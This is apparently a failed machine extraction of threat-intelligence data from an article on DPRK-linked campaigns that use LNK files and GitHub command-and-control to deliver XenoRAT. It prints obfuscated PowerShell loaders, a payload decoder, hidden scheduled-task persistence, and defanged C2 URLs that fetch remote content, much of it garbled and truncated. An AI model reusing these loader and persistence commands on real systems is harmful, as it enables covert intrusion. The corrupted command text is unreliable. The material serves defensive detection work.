# Failed YAML extraction
# Timestamp: 2026-05-01T19:42:04.609957
# Response length: 4021 chars
# Input chunk preview: '=== ARTICLE BODY ===FortiGuard Labs Threat ResearchDPRK-Related Campaigns with LNK and GitHub C2How DPRK actors use LNK files and GitHub C2 to evade detection and maintain persistenceFortiGuard Securi'
# ============================================================

title: "DPRK-Related Campaigns with LNK and GitHub C2"
description: DPRK actors use LNK files and GitHub as Command and Control (C2) infrastructure to evade detection and maintain persistence.
attribution: ""
malware_families:
  - XenoRAT
cves: []
ttps:
  processes:
    - powershell.exe
    - wscript.exe
  command_lines:
    - "$j3 = Get-Location; $Ygh = Join-Path $j3 ('Technical Paper for Creata Chain.pdf.1nk'); $KQD = $env:TEMP; if (-not(Test-Path $gh)) { $Nx2 = Get-ChildItem $|ERrOraCTIoN SILeNtLyConTinuE | where-ObJEct { $_.nAmE -eQ 'Technical Paper for Creata ChasoRt-obJECt 1ASTWRATEtIME -DEsCendInG | Select-Object -FIrsT 1; If ($Nx2) { $Ygh = $N|else { exit; } }; function pl { param($nW, $3jB, $EG, $zNo) $LT = New-Object B$Nm = [System.IO.File]::OpenRead($Ygh); $Nm.Seek($nW, [System.IO.SeekOrigin]::BEGIN);0, $jB); $Nm.Close(); FOR ($Ci = @; $Ci -LT $3jB; $Ci++) { SLT[$Ci] = $LT[}; Set-Content $zN@ $LT -Encoding Byte; }; $jp = Join-Path $KQD ('Technical Paper forChain.pdf'); pl 8192 1965784 157 $jp; & $jp; $IV = Join-Path $KQD ([System.IO.Path]::GetR'.psl'); pl 1973976 7300 100 $IV; powershell -noprofile -windowstyle hidden -executionpol$3V; Remove-Item -Path $IV -Force;"
    - "powershell -WindowStyle Hidden -nop -NonInteractive -NgExecutionPolicy Bypass -Command "& {$abc = Join-Path ($env:AppData) \"chrome.ps1\"; & $abc;}"
  powershell:
    - "$VIUSBvejbawf = \"142 99 115 37 136 66 90 101 94 165 98 106 103 37 165 100 110 123 107 94 74 110 161 83 (omit) 87 107 103 151\";$Length = $VIUSBvejbawf.Length;$CLOIISFYSystem.Collections.ArrayList;[string] $date = $null;$m = @;for($k = @; $k -lt $Length;$VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \" \"){[void]$CLOIISfgiojvosef235sdb.Add($null);continue; }}$Apkengsidefg = \"Kdt& %bgek\";[Byte[]]$pw =[System.Text.Encoding]::UTF8.GetBytes(\"$Apkengsidefg\");$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]({= @;for($i = @; $i -lt $CLOIISfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;$CLOIISFgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] = $pw_num -$CLOIISFgiojvosef235sg$pw_Length){$j = @;}}$aqqpvm = [System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg234\"$env:appdata\firefox.ps1\";$qqpvm|Out-File -FilePath $fgfw98IHGVFfeg;powershell -wilBypass $fgfw98IHGVfeg;"
    - "$action = New-ScheduledTaskAction -Execute 'wscript.exe' -Argument ('"' + $vbsFilePath + '"'); $trigger = New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Minutes 30); $settings = New-ScheduledTaskSettingsSet -Hidden; Register-ScheduledTask -TaskName 'Technical Paper for Creata Chain Task S-1-12-3-1231241245BVSKLERh-SD234GHSI56' -Action $action -Trigger $trigger -Settings $settings"
  scripts:
    - "{[Text.Encoding]::UTF8.GetString(...)}"
  registry_keys: []
  image_loads: []
  network_connections:
    - "powershell.exe -> hxxps://api[.]github[.]com/repos/motoralis/singled/contents/kcca/technik"
    - "powershell.exe -> hxxps://raw[.]githubusercontent[.]com/motoralis/singled/main/kcca/paper[.]jim"
  file_activity:
    - "$env:appdata\chrome.ps1"
    - "$env:appdata\temp.psl"
    - "$env:system_first.psl"
    - "$env:appdata\firefox.ps1"
    - "C:\Users\<username>\AppData\Local\Temp\3F=C|X|2&AF|0|FISTYCHES/PNE-N pdf"
  persistence:
    - "Scheduled Task (Technical Paper for Creata Chain Task S-1-12-3-1231241245BVSKLERh-SD234GHSI56) pointing to a VBScript that executes the PowerShell payload in a hidden window"
  process_relations: []
iocs:
  hashes:
    - 9c3f2bd300ad2ef8584cc48adc47aab61bf85fc653d923e106c73fc6ec3ea1dc
    - f20fde3a9381c22034f7ecd4fef2396a85c05bfd54f7db3ad6bcd00c9e09d421
    - 484a16d779d67c7339125ceac10b9abf1aa47f561f40058789bfe2acda548282
    - c0866bb72c7a12a0288f434e16ba14eeaa35d3c4cff4a86046c553c15679c0b5
  ip_addresses: []
  domains:
    - github[.]com
  urls:
    - hxxps://api[.]github[.]com/repos/motoralis/singled/contents/kcca/technik
    - hxxps://raw[.]githubusercontent[.]com/motoralis/singled/main/kcca/paper[.]jim
authors: []